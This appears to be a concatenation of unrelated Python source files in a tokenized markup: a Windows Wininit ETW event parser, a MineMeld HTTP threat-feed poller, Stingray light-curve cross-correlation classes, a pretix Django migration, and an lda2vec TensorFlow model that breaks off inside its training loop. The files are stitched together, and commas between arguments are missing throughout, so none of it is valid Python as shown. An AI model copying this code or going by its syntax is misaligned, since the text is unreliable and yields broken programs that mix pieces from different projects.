"""<import_from_stmt>construct Int8sl Int8ul Int16ul Int16sl Int32sl Int32ul Int64sl Int64ul Bytes Double Float32l Struct<import_from_stmt>etl.utils WString CString SystemTime Guid<import_from_stmt>etl.dtyp Sid<import_from_stmt>etl.parsers.etw.core Etw declare guid<line_sep>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=9 version=0)<class_stmt>Microsoft_Windows_Wininit_9_0(Etw)<block_start>pattern=Struct("Flags"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=10 version=0)<class_stmt>Microsoft_Windows_Wininit_10_0(Etw)<block_start>pattern=Struct("Win32Status"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=11 version=0)<class_stmt>Microsoft_Windows_Wininit_11_0(Etw)<block_start>pattern=Struct("StringCount"/Int32ul "String"/WString)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=12 version=0)<class_stmt>Microsoft_Windows_Wininit_12_0(Etw)<block_start>pattern=Struct("Level"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=14 version=0)<class_stmt>Microsoft_Windows_Wininit_14_0(Etw)<block_start>pattern=Struct("Config"/Int32ul "IsTestConfig"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=16 version=0)<class_stmt>Microsoft_Windows_Wininit_16_0(Etw)<block_start>pattern=Struct("Level"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=17 version=0)<class_stmt>Microsoft_Windows_Wininit_17_0(Etw)<block_start>pattern=Struct("Level"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=53 version=0)<class_stmt>Microsoft_Windows_Wininit_53_0(Etw)<block_start>pattern=Struct("SessionId"/Int32ul "Flags"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=55 version=0)<class_stmt>Microsoft_Windows_Wininit_55_0(Etw)<block_start>pattern=Struct("SessionId"/Int32ul "IsRemote"/Int32ul "GracePeriod"/Int32ul "Flags"/Int32ul "Reason"/Int32ul "Message"/WString)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=6001 version=0)<class_stmt>Microsoft_Windows_Wininit_6001_0(Etw)<block_start>pattern=Struct("Flags"/Int32ul)<block_end>@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b") event_id=6002 version=1)<class_stmt>Microsoft_Windows_Wininit_6002_1(Etw)<block_start>pattern=Struct("ShutdownFlags"/Int32ul "SystemShutdownDuration"/Int64ul "SkuHasLogoff"/Int32ul)<block_end>
|
# Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module implements minemeld.ft.http.HttpFT, the Miner node for plain
text feeds over HTTP/HTTPS.
"""<import_stmt>requests<import_stmt>logging<import_stmt>re<import_stmt>itertools<import_from_stmt>minemeld __version__<as>MM_VERSION<import_from_stmt>. basepoller<line_sep>LOG=logging.getLogger(__name__)<class_stmt>HttpFT(basepoller.BasePollerFT)<block_start>"""Implements class for miners of plain text feeds over http/https.
**Config parameters**
:url: URL of the feed.
:polling_timeout: timeout of the polling request in seconds.
Default: 20
:verify_cert: boolean, if *true* feed HTTPS server certificate is
verified. Default: *true*
:user_agent: string, value for the User-Agent header in HTTP
request. If ``MineMeld``, MineMeld/<version> is used.
Default: python ``requests`` default.
:ignore_regex: Python regular expression for lines that should be
ignored. Default: *null*
:indicator: an *extraction dictionary* to extract the indicator from
the line. If *null*, the text until the first whitespace or newline
character is used as indicator. Default: *null*
:fields: a dictionary of *extraction dictionaries* to extract
additional attributes from each line. Default: {}
:encoding: encoding of the feed, if not UTF-8. See
``str.decode`` for options. Default: *null*, meaning do
nothing (assumes UTF-8).
**Extraction dictionary**
Extraction dictionaries contain the following keys:
:regex: Python regular expression for searching the text.
:transform: template to generate the final value from the result
of the regular expression. Default: the entire match of the regex
is used as extracted value.
See Python `re <https://docs.python.org/2/library/re.html>`_ module for
details about Python regular expressions and templates.
Example:
Example config in YAML where extraction dictionaries are used to
extract the indicator and additional fields::
url: https://www.dshield.org/block.txt
ignore_regex: "[#S].*"
indicator:
regex: '^([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\t([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})'
transform: '\\1-\\2'
fields:
dshield_nattacks:
regex: '^.*\\t.*\\t[0-9]+\\t([0-9]+)'
transform: '\\1'
dshield_name:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t([^\\t]+)'
transform: '\\1'
dshield_country:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t[^\\t]+\\t([A-Z]+)'
transform: '\\1'
dshield_email:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t[^\\t]+\\t[A-Z]+\\t(\\S+)'
transform: '\\1'
Example config in YAML where the text in each line until the first
whitespace is used as indicator::
url: https://ransomwaretracker.abuse.ch/downloads/CW_C2_URLBL.txt
ignore_regex: '^#'
Args:
name (str): node name, should be unique inside the graph
chassis (object): parent chassis instance
config (dict): node config.
"""<def_stmt>configure self<block_start>super(HttpFT self).configure()<line_sep>self.url=self.config.get('url' <none>)<line_sep>self.polling_timeout=self.config.get('polling_timeout' 20)<line_sep>self.verify_cert=self.config.get('verify_cert' <true>)<line_sep>self.user_agent=self.config.get('user_agent' <none>)<line_sep>self.encoding=self.config.get('encoding' <none>)<line_sep>self.username=self.config.get('username' <none>)<line_sep>self.password=self.config.get('password' <none>)<line_sep>self.ignore_regex=self.config.get('ignore_regex' <none>)<if_stmt>self.ignore_regex<is><not><none><block_start>self.ignore_regex=re.compile(self.ignore_regex)<block_end>self.indicator=self.config.get('indicator' <none>)<if_stmt>self.indicator<is><not><none><block_start><if_stmt>'regex'<in>self.indicator<block_start>self.indicator['regex']=re.compile(self.indicator['regex'])<block_end><else_stmt><block_start><raise>ValueError('%s - indicator stanza should have a regex' self.name)<block_end><if_stmt>'transform'<not><in>self.indicator<block_start><if_stmt>self.indicator['regex'].groups<g>0<block_start>LOG.warning('%s - no transform string for indicator'<concat>' but pattern contains groups' self.name)<block_end>self.indicator['transform']='\g<0>'<block_end><block_end>self.fields=self.config.get('fields' {})<for_stmt>f,fattrs self.fields.iteritems()<block_start><if_stmt>'regex'<in>fattrs<block_start>fattrs['regex']=re.compile(fattrs['regex'])<block_end><else_stmt><block_start><raise>ValueError('%s - %s field does not have a regex' self.name f)<block_end><if_stmt>'transform'<not><in>fattrs<block_start><if_stmt>fattrs['regex'].groups<g>0<block_start>LOG.warning('%s - no transform string for field %s'<concat>' but pattern contains groups' self.name f)<block_end>fattrs['transform']='\g<0>'<block_end><block_end><block_end><def_stmt>_process_item self line<block_start>line=line.strip()<if_stmt><not>line<block_start><return>[[<none> <none>]]<block_end><if_stmt>self.indicator<is><none><block_start>indicator=line.split()[0]<block_end><else_stmt><block_start>indicator=self.indicator['regex'].search(line)<if_stmt>indicator<is><none><block_start><return>[[<none> <none>]]<block_end>indicator=indicator.expand(self.indicator['transform'])<block_end>attributes={}<for_stmt>f,fattrs self.fields.iteritems()<block_start>m=fattrs['regex'].search(line)<if_stmt>m<is><none><block_start><continue><block_end>attributes[f]=m.expand(fattrs['transform'])<try_stmt><block_start>i=int(attributes[f])<block_end><except_stmt><block_start><pass><block_end><else_stmt><block_start>attributes[f]=i<block_end><block_end><return>[[indicator attributes]]<block_end><def_stmt>_build_iterator self now<block_start>rkwargs=dict(stream=<true> verify=self.verify_cert timeout=self.polling_timeout)<if_stmt>self.user_agent<is><not><none><block_start><if_stmt>self.user_agent<eq>'MineMeld'<block_start>rkwargs['headers']={'User-Agent':'MineMeld/%s'%MM_VERSION}<block_end><else_stmt><block_start>rkwargs['headers']={'User-Agent':self.user_agent}<block_end><block_end><if_stmt>self.username<is><not><none><and>self.password<is><not><none><block_start>rkwargs['auth']=(self.username self.password)<block_end>r=requests.get(self.url **rkwargs)<try_stmt><block_start>r.raise_for_status()<block_end><except_stmt><block_start>LOG.debug('%s - exception in request: %s %s' self.name r.status_code r.content)<line_sep><raise><block_end>result=r.iter_lines()<if_stmt>self.ignore_regex<is><not><none><block_start>result=itertools.ifilter(<lambda>x:self.ignore_regex.match(x)<is><none> 
result)<block_end><if_stmt>self.encoding<is><not><none><block_start>result=itertools.imap(<lambda>x:x.decode(self.encoding).encode('utf_8') result)<block_end><return>result<block_end><block_end>
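# Hedged illustration of how an extraction dictionary is applied in _process_item above
# (kept as a comment; the sample line and the simplified regex are made up):
# line = '192.0.2.0\t192.0.2.255\t24\t100\texample\tUS\tabuse@example.com'
# m = re.compile(r'^([0-9.]+)\t([0-9.]+)').search(line)
# m.expand('\\1-\\2')  # -> '192.0.2.0-192.0.2.255', used as the indicator value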
|
<import_stmt>warnings<import_stmt>numpy<as>np<import_from_stmt>scipy signal<try_stmt><block_start><import_from_stmt>pyfftw.interfaces.scipy_fft ifft fftfreq<block_end><except_stmt>ImportError<block_start>warnings.warn("pyfftw not installed. Using standard scipy fft")<import_from_stmt>scipy.fft ifft fftfreq<block_end><import_from_stmt>stingray.lightcurve Lightcurve<import_from_stmt>stingray.crossspectrum Crossspectrum AveragedCrossspectrum<import_from_stmt>stingray.exceptions StingrayError<import_stmt>stingray.utils<as>utils<line_sep>__all__=['CrossCorrelation' 'AutoCorrelation']<class_stmt>CrossCorrelation(object)<block_start>"""Make a cross-correlation from light curves or a cross spectrum.
You can also make an empty :class:`CrossCorrelation` object to populate
with your own cross-correlation data.
Parameters
----------
lc1: :class:`stingray.Lightcurve` object, optional, default ``None``
The first light curve data for correlation calculations.
lc2: :class:`stingray.Lightcurve` object, optional, default ``None``
The light curve data for the correlation calculations.
cross: :class:`stingray.Crossspectrum` object, default ``None``
The cross spectrum data for the correlation calculations.
mode: {``full``, ``valid``, ``same``}, optional, default ``same``
A string indicating the size of the correlation output.
See the relevant ``scipy`` documentation [scipy-docs]_
for more details.
Attributes
----------
lc1: :class:`stingray.Lightcurve`
The first light curve data for correlation calculations.
lc2: :class:`stingray.Lightcurve`
The light curve data for the correlation calculations.
cross: :class:`stingray.Crossspectrum`
The cross spectrum data for the correlation calculations.
corr: numpy.ndarray
An array of correlation data calculated from two light curves
time_lags: numpy.ndarray
An array of all possible time lags against which each point in corr is calculated
dt: float
The time resolution of each light curve (used in ``time_lag`` calculations)
time_shift: float
Time lag that gives maximum value of correlation between two light curves.
There will be maximum correlation between light curves if one of the light curves
is shifted by ``time_shift``.
n: int
Number of points in ``self.corr`` (length of cross-correlation data)
auto: bool
An internal flag to indicate whether this is a cross-correlation or an auto-correlation.
References
----------
.. [scipy-docs] https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.correlate.html
"""<def_stmt>__init__ self lc1=<none> lc2=<none> cross=<none> mode='same'<block_start>self.auto=<false><if_stmt>isinstance(mode str)<is><false><block_start><raise>TypeError("mode must be a string")<block_end><if_stmt>mode.lower()<not><in>["full" "valid" "same"]<block_start><raise>ValueError("mode must be 'full', 'valid' or 'same'!")<block_end>self.mode=mode.lower()<line_sep>self.lc1=<none><line_sep>self.lc2=<none><line_sep>self.cross=<none><line_sep># Populate all attributes by ``None` if user passes no lightcurve data
<if_stmt>lc1<is><none><or>lc2<is><none><block_start><if_stmt>lc1<is><not><none><or>lc2<is><not><none><block_start><raise>TypeError("You can't do a cross correlation with just one "<concat>"light curve!")<block_end><else_stmt><block_start><if_stmt>cross<is><none># all object input params are ``None``
<block_start>self.corr=<none><line_sep>self.time_shift=<none><line_sep>self.time_lags=<none><line_sep>self.dt=<none><line_sep>self.n=<none><block_end><else_stmt><block_start>self._make_cross_corr(cross)<line_sep><return><block_end><block_end><block_end><else_stmt><block_start>self._make_corr(lc1 lc2)<block_end><block_end><def_stmt>_make_cross_corr self cross<block_start>"""
Do some checks on the cross spectrum supplied to the method,
and then calculate the time shifts, time lags and cross correlation.
Parameters
----------
cross: :class:`stingray.Crossspectrum` object
The crossspectrum, averaged or not.
"""<if_stmt><not>isinstance(cross Crossspectrum)<block_start><if_stmt><not>isinstance(cross AveragedCrossspectrum)<block_start><raise>TypeError("cross must be a crossspectrum.Crossspectrum \
or crossspectrum.AveragedCrossspectrum object")<block_end><block_end><if_stmt>self.cross<is><none><block_start>self.cross=cross<line_sep>self.dt=1/(cross.df<times>cross.n)<block_end><if_stmt>self.dt<is><none><block_start>self.dt=1/(cross.df<times>cross.n)<block_end>prelim_corr=abs(ifft(cross.power).real)# keep only the real
self.n=len(prelim_corr)<line_sep># ifft spits out an array that looks like [0,1,...n,-n,...-1]
# where n is the last positive frequency
# correcting for this by putting them in order
times=fftfreq(self.n cross.df)<line_sep>time,corr=np.array(sorted(zip(times prelim_corr))).T<line_sep>self.corr=corr<line_sep>self.time_shift,self.time_lags,self.n=self.cal_timeshift(dt=self.dt)<block_end><def_stmt>_make_corr self lc1 lc2<block_start>"""
Do some checks on the light curves supplied to the method, and then calculate the time
shifts, time lags and cross correlation.
Parameters
----------
lc1::class:`stingray.Lightcurve` object
The first light curve data.
lc2::class:`stingray.Lightcurve` object
The second light curve data.
"""<if_stmt><not>isinstance(lc1 Lightcurve)<block_start><raise>TypeError("lc1 must be a lightcurve.Lightcurve object")<block_end><if_stmt><not>isinstance(lc2 Lightcurve)<block_start><raise>TypeError("lc2 must be a lightcurve.Lightcurve object")<block_end><if_stmt><not>np.isclose(lc1.dt lc2.dt)<block_start><raise>StingrayError("Light curves do not have "<concat>"same time binning dt.")<block_end><else_stmt># ignore very small differences in dt neglected by np.isclose()
<block_start>lc1.dt=lc2.dt<line_sep>self.dt=lc1.dt<block_end># self.lc1 and self.lc2 may get assigned values explicitly in which case there is no need to copy data
<if_stmt>self.lc1<is><none><block_start>self.lc1=lc1<block_end><if_stmt>self.lc2<is><none><block_start>self.lc2=lc2<block_end># Subtract means before passing scipy.signal.correlate into correlation
lc1_counts=self.lc1.counts-np.mean(self.lc1.counts)<line_sep>lc2_counts=self.lc2.counts-np.mean(self.lc2.counts)<line_sep># Calculates cross-correlation of two lightcurves
self.corr=signal.correlate(lc1_counts lc2_counts self.mode)<line_sep>self.n=len(self.corr)<line_sep>self.time_shift,self.time_lags,self.n=self.cal_timeshift(dt=self.dt)<block_end><def_stmt>cal_timeshift self dt=1.0<block_start>"""
Calculate the cross correlation against all possible time lags, both positive and negative.
Parameters
----------
dt: float, optional, default ``1.0``
Time resolution of the light curve, should be passed when object is populated with
correlation data and no information about light curve can be extracted. Used to
calculate ``time_lags``.
Returns
-------
self.time_shift: float
Value of the time lag that gives maximum value of correlation between two light curves.
self.time_lags: numpy.ndarray
An array of ``time_lags`` calculated from correlation data
"""<if_stmt>self.dt<is><none><block_start>self.dt=dt<block_end><if_stmt>self.corr<is><none><block_start><if_stmt>(self.lc1<is><none><or>self.lc2<is><none>)<and>(self.cross<is><none>)<block_start><raise>StingrayError('Please provide either two lightcurve objects or \
a [average]crossspectrum object to calculate correlation and time_shift')<block_end><else_stmt># This will cover very rare case of assigning self.lc1 and lc2
# or self.cross and also self.corr = ``None``.
# In this case, correlation is calculated using self.lc1
# and self.lc2 and using that correlation data,
# time_shift is calculated.
<block_start><if_stmt>self.cross<is><not><none><block_start>self._make_cross_corr(self.cross)<block_end><else_stmt><block_start>self._make_corr(self.lc1 self.lc2)<block_end><block_end><block_end>self.n=len(self.corr)<line_sep>dur=int(self.n/2)<line_sep># Correlation against all possible lags, positive as well as negative lags are stored
x_lags=np.linspace(-dur dur self.n)<line_sep>self.time_lags=x_lags<times>self.dt<line_sep># time_shift is the time lag for max. correlation
self.time_shift=self.time_lags[np.argmax(self.corr)]<line_sep><return>self.time_shift self.time_lags self.n<block_end><def_stmt>plot self labels=<none> axis=<none> title=<none> marker='-' save=<false> filename=<none> ax=<none><block_start>"""
Plot the :class:`CrossCorrelation` as a function of time lag using Matplotlib.
Plot the CrossCorrelation object as a graph, with ``self.time_lags`` on the x-axis and
``self.corr`` on the y-axis.
Parameters
----------
labels : iterable, default ``None``
A list or tuple with ``xlabel`` and ``ylabel`` as strings.
axis : list, tuple, string, default ``None``
Parameter to set axis properties of ``matplotlib`` figure. For example
it can be a list like ``[xmin, xmax, ymin, ymax]`` or any other
acceptable argument for ``matplotlib.pyplot.axis()`` function.
title : str, default ``None``
The title of the plot.
marker : str, default ``-``
Line style and color of the plot. Line styles and colors are
combined in a single format string, as in ``'bo'`` for blue
circles. See ``matplotlib.pyplot.plot`` for more options.
save : boolean, optional (default=False)
If True, save the figure with specified filename.
filename : str
File name of the image to save. Depends on the boolean ``save``.
ax : ``matplotlib.Axes`` object
An axes object to fill with the cross correlation plot.
"""<try_stmt><block_start><import_stmt>matplotlib.pyplot<as>plt<block_end><except_stmt>ImportError<block_start><raise>ImportError("Matplotlib required for plot()")<block_end><if_stmt>ax<is><none><block_start>fig,ax=plt.subplots(1 1 figsize=(6 4))<block_end>ax.plot(self.time_lags self.corr marker)<if_stmt>labels<is><not><none><block_start><try_stmt><block_start>ax.set_xlabel(labels[0])<line_sep>ax.set_ylabel(labels[1])<block_end><except_stmt>TypeError<block_start>utils.simon("``labels`` must be either a list or tuple with "<concat>"x and y labels.")<line_sep><raise><block_end><except_stmt>IndexError<block_start>utils.simon("``labels`` must have two labels for x and y "<concat>"axes.")<line_sep># Not raising here because in case of len(labels)==1, only
# x-axis will be labelled.
<block_end><block_end># axis is a tuple containing formatting information
<if_stmt>axis<is><not><none><block_start>ax.axis(axis)<block_end><if_stmt>title<is><not><none><block_start>ax.set_title(title)<block_end><if_stmt>save<block_start><if_stmt>filename<is><none><block_start>plt.savefig('corr.pdf' format="pdf")<block_end><else_stmt><block_start>plt.savefig(filename)<block_end><block_end><else_stmt><block_start>plt.show(block=<false>)<block_end><return>ax<block_end><block_end><class_stmt>AutoCorrelation(CrossCorrelation)<block_start>"""
Make an auto-correlation from a light curve.
You can also make an empty AutoCorrelation object to populate with your
own auto-correlation data.
Parameters
----------
lc: :class:`stingray.Lightcurve` object, optional, default ``None``
The light curve data for correlation calculations.
mode: {``full``, ``valid``, ``same``}, optional, default ``same``
A string indicating the size of the correlation output.
See the relevant ``scipy`` documentation [scipy-docs]
for more details.
Attributes
----------
lc1, lc2: :class:`stingray.Lightcurve`
The light curve data for correlation calculations.
corr: numpy.ndarray
An array of correlation data calculated from lightcurve data
time_lags: numpy.ndarray
An array of all possible time lags against which each point in corr is calculated
dt: float
The time resolution of each lightcurve (used in time_lag calculations)
time_shift: float, zero
Max. Value of AutoCorrelation is always at zero lag.
n: int
Number of points in self.corr (length of auto-correlation data)
"""<def_stmt>__init__ self lc=<none> mode='same'<block_start>CrossCorrelation.__init__(self lc1=lc lc2=lc mode=mode)<line_sep>self.auto=<true><block_end><block_end>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-03-03 16:41
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db migrations models<def_stmt>set_position apps schema_editor<block_start>Question=apps.get_model('pretixbase' 'Question')<for_stmt>q Question.objects.all()<block_start><for_stmt>i,option enumerate(q.options.all())<block_start>option.position=i<line_sep>option.save()<block_end><block_end><block_end><class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('pretixbase' '0083_auto_20180228_2102') ]<line_sep>operations=[migrations.AlterModelOptions(name='questionoption' options={'ordering':('position' 'id') 'verbose_name':'Question option' 'verbose_name_plural':'Question options'} ) migrations.AddField(model_name='questionoption' name='position' field=models.IntegerField(default=0) ) migrations.AlterField(model_name='question' name='position' field=models.PositiveIntegerField(default=0 verbose_name='Position') ) migrations.RunPython(set_position reverse_code=migrations.RunPython.noop ) ]<block_end>
|
<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_stmt>lda2vec.word_embedding<as>W<import_stmt>lda2vec.embedding_mixture<as>M<import_stmt>lda2vec.dirichlet_likelihood<as>DL<import_from_stmt>lda2vec utils<import_from_stmt>datetime datetime<import_stmt>warnings<line_sep>warnings.filterwarnings("ignore" category=DeprecationWarning)<class_stmt>Lda2vec<block_start>RESTORE_KEY='to_restore'<def_stmt>__init__ self num_unique_documents vocab_size num_topics freqs=<none> save_graph_def=<true> embedding_size=128 num_sampled=40 learning_rate=0.001 lmbda=200.0 alpha=<none> power=0.75 batch_size=500 logdir='logdir' restore=<false> fixed_words=<false> factors_in=<none> pretrained_embeddings=<none><block_start>"""Summary
Args:
num_unique_documents (int): Number of unique documents in your dataset
vocab_size (int): Number of unique words/tokens in your dataset
num_topics (int): The set number of topics to cluster your data into
freqs (list, optional): Python list of length vocab_size with frequencies of each token
save_graph_def (bool, optional): If true, we will save the graph to logdir
embedding_size (int, optional): Dimension of the embeddings. This will be shared between docs, words, and topics.
num_sampled (int, optional): Negative sampling number for NCE Loss.
learning_rate (float, optional): Learning rate for optimizer
lmbda (float, optional): Strength of dirichlet prior
alpha (None, optional): alpha of dirichlet process (defaults to 1/n_topics)
power (float, optional): unigram sampler distortion
batch_size (int, optional): Batch size coming into model
logdir (str, optional): Location for models to be saved - note, we will append on the datetime too on each run
restore (bool, optional): When True, we will restore the model from the logdir parameter's location
fixed_words (bool, optional): If True and pretrained_embeddings are given, the word embeddings are loaded as constants and are not trained
factors_in (None, optional): Pretrained Topic Embedding (shape should be [num_topics, embedding_size])
pretrained_embeddings (np.ndarray, optional): Pretrained word embedding matrix (shape should be [vocab_size, embedding_size])
"""<line_sep>self.config=tf.ConfigProto()<line_sep>self.config.gpu_options.allow_growth=<true><line_sep>self.sesh=tf.Session(config=self.config)<line_sep>self.moving_avgs=tf.train.ExponentialMovingAverage(0.9)<line_sep>self.num_unique_documents=num_unique_documents<line_sep>self.vocab_size=vocab_size<line_sep>self.num_topics=num_topics<line_sep>self.freqs=freqs<line_sep>self.save_graph_def=save_graph_def<line_sep>self.logdir=logdir<line_sep>self.embedding_size=embedding_size<line_sep>self.num_sampled=num_sampled<line_sep>self.learning_rate=learning_rate<line_sep>self.lmbda=lmbda<line_sep>self.alpha=alpha<line_sep>self.power=power<line_sep>self.batch_size=batch_size<line_sep>self.pretrained_embeddings=pretrained_embeddings<line_sep>self.factors_in=factors_in<line_sep>self.compute_normed=<false><line_sep>self.fixed_words=fixed_words<if_stmt><not>restore<block_start>self.date=datetime.now().strftime('%y%m%d_%H%M')<line_sep>self.logdir=('{}_{}').format(self.logdir self.date)<line_sep># Load pretrained embeddings if provided.
<if_stmt>isinstance(pretrained_embeddings np.ndarray)<block_start>W_in=tf.constant(pretrained_embeddings name="word_embedding")<if>fixed_words<else>tf.get_variable("word_embedding" shape=[self.vocab_size self.embedding_size] initializer=tf.constant_initializer(pretrained_embeddings))<block_end><else_stmt><block_start>W_in=<none><block_end># Initialize the word embedding
self.w_embed=W.Word_Embedding(self.embedding_size self.vocab_size self.num_sampled W_in=W_in freqs=self.freqs power=self.power)<line_sep># Initialize the Topic-Document Mixture
self.mixture=M.EmbedMixture(self.num_unique_documents self.num_topics self.embedding_size)<line_sep># Builds the graph and returns variables within it
handles=self._build_graph()<for_stmt>handle handles<block_start>tf.add_to_collection(Lda2vec.RESTORE_KEY handle)<block_end># Add Word Embedding Variables to collection
tf.add_to_collection(Lda2vec.RESTORE_KEY self.w_embed.embedding)<line_sep>tf.add_to_collection(Lda2vec.RESTORE_KEY self.w_embed.nce_weights)<line_sep>tf.add_to_collection(Lda2vec.RESTORE_KEY self.w_embed.nce_biases)<line_sep># Add Doc Mixture Variables to collection
tf.add_to_collection(Lda2vec.RESTORE_KEY self.mixture.doc_embedding)<line_sep>tf.add_to_collection(Lda2vec.RESTORE_KEY self.mixture.topic_embedding)<line_sep>(self.x self.y self.docs self.step self.switch_loss self.word_context self.doc_context self.loss_word2vec self.fraction self.loss_lda self.loss self.loss_avgs_op self.optimizer self.merged)=handles<block_end><else_stmt><block_start>meta_graph=logdir+'/model.ckpt'<line_sep>tf.train.import_meta_graph(meta_graph+'.meta').restore(self.sesh meta_graph)<line_sep>handles=self.sesh.graph.get_collection(Lda2vec.RESTORE_KEY)<line_sep>(self.x self.y self.docs self.step self.switch_loss self.word_context self.doc_context self.loss_word2vec self.fraction self.loss_lda self.loss self.loss_avgs_op self.optimizer self.merged embedding nce_weights nce_biases doc_embedding topic_embedding)=handles<line_sep>self.w_embed=W.Word_Embedding(self.embedding_size self.vocab_size self.num_sampled W_in=embedding freqs=self.freqs power=self.power nce_w_in=nce_weights nce_b_in=nce_biases)<line_sep># Initialize the Topic-Document Mixture
self.mixture=M.EmbedMixture(self.num_unique_documents self.num_topics self.embedding_size W_in=doc_embedding factors_in=topic_embedding)<block_end><block_end><def_stmt>prior self<block_start>"""Computes Dirichlet Prior.
Returns:
TYPE: Dirichlet Prior Value
"""<line_sep>doc_prior=DL.dirichlet_likelihood(self.mixture.doc_embedding alpha=self.alpha)<line_sep><return>doc_prior<block_end><def_stmt>_build_graph self<block_start>"""Builds the Lda2vec model graph.
"""<line_sep># Model Inputs
# Pivot Words
x=tf.placeholder(tf.int32 shape=[<none>] name='x_pivot_idxs')<line_sep># Context/Target Words
y=tf.placeholder(tf.int64 shape=[<none>] name='y_target_idxs')<line_sep># Document ID
docs=tf.placeholder(tf.int32 shape=[<none>] name='doc_ids')<line_sep># Global Step
step=tf.Variable(0 trainable=<false> name='global_step')<line_sep># What epoch should we switch on lda loss?
switch_loss=tf.Variable(0 trainable=<false>)<line_sep># Word embedding lookup
word_context=tf.nn.embedding_lookup(self.w_embed.embedding x name='word_embed_lookup')<line_sep># Document Context via document ID lookup
doc_context=self.mixture(doc_ids=docs)<line_sep># Compile word + doc context in list and add them together
contexts_to_add=[word_context doc_context]<line_sep>context=tf.add_n(contexts_to_add name='context_vector')<line_sep># Compute Word2Vec Loss
<with_stmt>tf.name_scope('nce_loss')<block_start>loss_word2vec=self.w_embed(context y)<line_sep>tf.summary.scalar('nce_loss' loss_word2vec)<block_end># Compute LDA Loss
<with_stmt>tf.name_scope('lda_loss')<block_start>fraction=tf.Variable(1 trainable=<false> dtype=tf.float32 name='fraction')<line_sep>loss_lda=self.lmbda<times>fraction<times>self.prior()<line_sep>tf.summary.scalar('lda_loss' loss_lda)<block_end># Determine if we should be using only word2vec loss or if we should add in LDA loss based on switch_loss Variable
loss=tf.cond(step<l>switch_loss <lambda>:loss_word2vec <lambda>:loss_word2vec+loss_lda)<line_sep># Add current loss to moving average of loss
loss_avgs_op=self.moving_avgs.apply([loss_lda loss_word2vec loss])<line_sep># Init the optimizer
<with_stmt>tf.control_dependencies([loss_avgs_op])<block_start>optimizer=tf.contrib.layers.optimize_loss(loss tf.train.get_global_step() self.learning_rate 'Adam' name='Optimizer')<block_end># Initialize all variables
self.sesh.run(tf.global_variables_initializer() options=tf.RunOptions(report_tensor_allocations_upon_oom=<true>))<line_sep># Create a merged summary of variables
merged=tf.summary.merge_all()<line_sep>to_return=[x y docs step switch_loss word_context doc_context loss_word2vec fraction loss_lda loss loss_avgs_op optimizer merged]<line_sep><return>to_return<block_end><def_stmt>train self pivot_words target_words doc_ids data_size num_epochs switch_loss_epoch=0 save_every=1 report_every=1 print_topics_every=5 idx_to_word=<none><block_start>"""Train the Lda2vec Model. pivot_words, target_words, and doc_ids should be
the same size.
Args:
pivot_words (np.array): Array of word idxs corresponding to pivot words
target_words (np.array): Array of word idxs corresponding to target words
doc_ids (TYPE): Document IDs linking word idxs to their docs
data_size (TYPE): Length of pivot_words array
num_epochs (TYPE): Number of epochs to train model
switch_loss_epoch (int, optional): Epoch to switch on LDA loss. LDA loss not learned
until this epoch
save_every (int, optional): Save model every "save_every" epoch
report_every (int, optional): Report model metrics every "report_every" epoch.
print_topics_every (int, optional): Print the top 10 words in each topic every "print_topics_every" epochs
idx_to_word (dict, optional): IDX-to-word mapping - required if you want to see word-topic membership
"""<line_sep># Calculate fraction used in DL Loss calculation
temp_fraction=self.batch_size<times>1.0/data_size<line_sep># Assign the fraction placeholder variable with the value we calculated
self.sesh.run(tf.assign(self.fraction temp_fraction))<line_sep># Calculate the number of iterations per epoch so we can figure out when to switch the loss
iters_per_epoch=int(np.ceil(data_size/float(self.batch_size)))<line_sep># Calculate what step we would be on @ the switch loss epoch
switch_loss_step=iters_per_epoch<times>switch_loss_epoch<line_sep># Assign the switch loss variable with the step we just calculated
self.sesh.run(tf.assign(self.switch_loss switch_loss_step))<if_stmt>self.save_graph_def# Initialize a tensorflow Saver object
<block_start>saver=tf.train.Saver()<line_sep># Initialize a tensorflow summary writer so we can save logs
writer=tf.summary.FileWriter(self.logdir+'/' graph=self.sesh.graph)<block_end># Iterate over the number of epochs we want to train for
<for_stmt>e range(num_epochs)<block_start>print('\nEPOCH:' e+1)<line_sep># Get a batch worth of data
<for_stmt>p,t,d utils.chunks(self.batch_size pivot_words target_words doc_ids)# Create the feed dict from the batched data
<block_start>feed_dict={self.x:p self.y:t self.docs:d}<line_sep># Values we want to fetch whenever we run the model
fetches=[self.merged self.optimizer self.loss self.loss_word2vec self.loss_lda self.step]<line_sep># Run a step of the model
